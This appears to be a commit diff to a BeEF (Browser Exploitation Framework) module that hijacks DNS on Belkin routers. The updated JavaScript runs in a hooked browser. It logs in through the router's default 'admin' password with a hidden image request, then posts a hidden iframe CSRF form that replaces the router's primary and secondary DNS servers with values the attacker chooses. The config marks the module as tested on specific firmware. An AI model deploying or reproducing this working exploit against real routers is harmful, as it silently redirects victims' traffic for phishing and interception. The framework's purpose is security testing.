Update Belkin DNS module

modules/exploits/router/belkin_dns_csrf/command.js

@@ -7,28 +7,48 @@
 beef.execute(function() {
 
 	// config
-	var gateway = '<%= @base %>'; 
-	var path    = '/cgi-bin/setup_dns.exe';
-	var dns     = '<%= @dns %>';
+	var proto   = 'http'
+	var rhost   = '<%= @rhost %>'; 
+	var dns1    = '<%= @dns1 %>';
+	var dns2    = '<%= @dns2 %>';
 	var timeout = 15;
 
-	// validate DNS server IP address
-	var parts = dns.split('.');
+	// validate primary DNS server IP address
+	var parts = dns1.split('.');
 	if (parts.length != 4) {
-		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
 		return;
 	}
 	for (var i=0; i<parts.length; i++) {
 		var part = parts[i];
 		if (isNaN(part) || part < 0 || part > 255) {
-			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
 			return;
 		}
 	}
-	var dns_1 = parts[0];
-	var dns_2 = parts[1];
-	var dns_3 = parts[2];
-	var dns_4 = parts[3];
+	var dns1_1 = parts[0];
+	var dns1_2 = parts[1];
+	var dns1_3 = parts[2];
+	var dns1_4 = parts[3];
+
+	// validate secondary DNS server IP address
+	var parts = dns2.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
+			return;
+		}
+        
+	}
+	var dns2_1 = parts[0];
+	var dns2_2 = parts[1];
+	var dns2_3 = parts[2];
+	var dns2_4 = parts[3];
 
 	// attempt auth with default password (admin)
 	// incorrect login attempts do not log out an authenticated session
@@ -37,24 +57,24 @@ beef.execute(function() {
 	img.setAttribute("width", "0");
 	img.setAttribute("height","0");
 	img.id = 'belkin_auth_<%= @command_id %>';
-	img.src = gateway+"/cgi-bin/login.exe?pws=admin";
+	img.src = proto + '://' + rhost + "/cgi-bin/login.exe?pws=admin";
 	document.body.appendChild(img);
 
 	// change DNS
-	var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "POST", "application/x-www-form-urlencoded", [
-		{'type':'hidden', 'name':'dns1_1',   'value':dns_1},
-		{'type':'hidden', 'name':'dns1_2',   'value':dns_2},
-		{'type':'hidden', 'name':'dns1_3',   'value':dns_3},
-		{'type':'hidden', 'name':'dns1_4',   'value':dns_4},
-		{'type':'hidden', 'name':'dns2_1',   'value':dns_1},
-		{'type':'hidden', 'name':'dns2_2',   'value':dns_2},
-		{'type':'hidden', 'name':'dns2_3',   'value':dns_3},
-		{'type':'hidden', 'name':'dns2_4',   'value':dns_4},
-		{'type':'hidden', 'name':'dns2_1_t', 'value':dns_1},
-		{'type':'hidden', 'name':'dns2_2_t', 'value':dns_2},
-		{'type':'hidden', 'name':'dns2_3_t', 'value':dns_3},
-		{'type':'hidden', 'name':'dns2_4_t', 'value':dns_4},
-		{'type':'hidden', 'name':'auto_from_isp', 'value':'0'}
+	var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(proto + '://' + rhost + '/cgi-bin/setup_dns.exe', "POST", "application/x-www-form-urlencoded", [
+		{'type':'hidden', 'name':'dns1_1',   'value':dns1_1},
+		{'type':'hidden', 'name':'dns1_2',   'value':dns1_2},
+		{'type':'hidden', 'name':'dns1_3',   'value':dns1_3},
+		{'type':'hidden', 'name':'dns1_4',   'value':dns1_4},
+		{'type':'hidden', 'name':'dns2_1',   'value':dns2_1},
+		{'type':'hidden', 'name':'dns2_2',   'value':dns2_2},
+		{'type':'hidden', 'name':'dns2_3',   'value':dns2_3},
+		{'type':'hidden', 'name':'dns2_4',   'value':dns2_4},
+		{'type':'hidden', 'name':'dns2_1_t', 'value':dns2_1},
+		{'type':'hidden', 'name':'dns2_2_t', 'value':dns2_2},
+		{'type':'hidden', 'name':'dns2_3_t', 'value':dns2_3},
+		{'type':'hidden', 'name':'dns2_4_t', 'value':dns2_4},
+		{'type':'hidden', 'name':'auto_from_isp', 'value':'0'} // disable dns from ISP
 	]);
 
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

modules/exploits/router/belkin_dns_csrf/config.yaml

@@ -3,13 +3,15 @@
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
+# Tested on F1PI242EGau_V1.00.002 and F1PI242EGau_V1.00.009
+#
 beef:
     module:
         belkin_dns_csrf:
             enable: true
             category: ["Exploits", "Router"]
             name: "Belkin DNS Hijack CSRF"
-            description: "Attempts to change the DNS setting on a Belkin router.<br/><br/>Multiple models are affected, including F5D7230 and F1PI242EG, however this module has not been tested."
+            description: "Attempts to change the DNS setting on a Belkin router.<br/><br/>Multiple models are affected, including F5D7230 and F1PI242EG."
             authors: ["bcoles"]
             target:
-                unknown: ["ALL"]
+                user_notify: ["ALL"]

modules/exploits/router/belkin_dns_csrf/module.rb

@@ -2,15 +2,14 @@
 # Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
-###
-# This module has not been tested
-###
+#
 class Belkin_dns_csrf < BeEF::Core::Command
   
 	def self.options
 		return [
-			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
-			{'name' => 'dns', 'ui_label' => 'DNS Server', 'value' => '8.8.8.8'}
+			{'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '10.1.1.1'},
+			{'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8'},
+			{'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4'}
 		]
 	end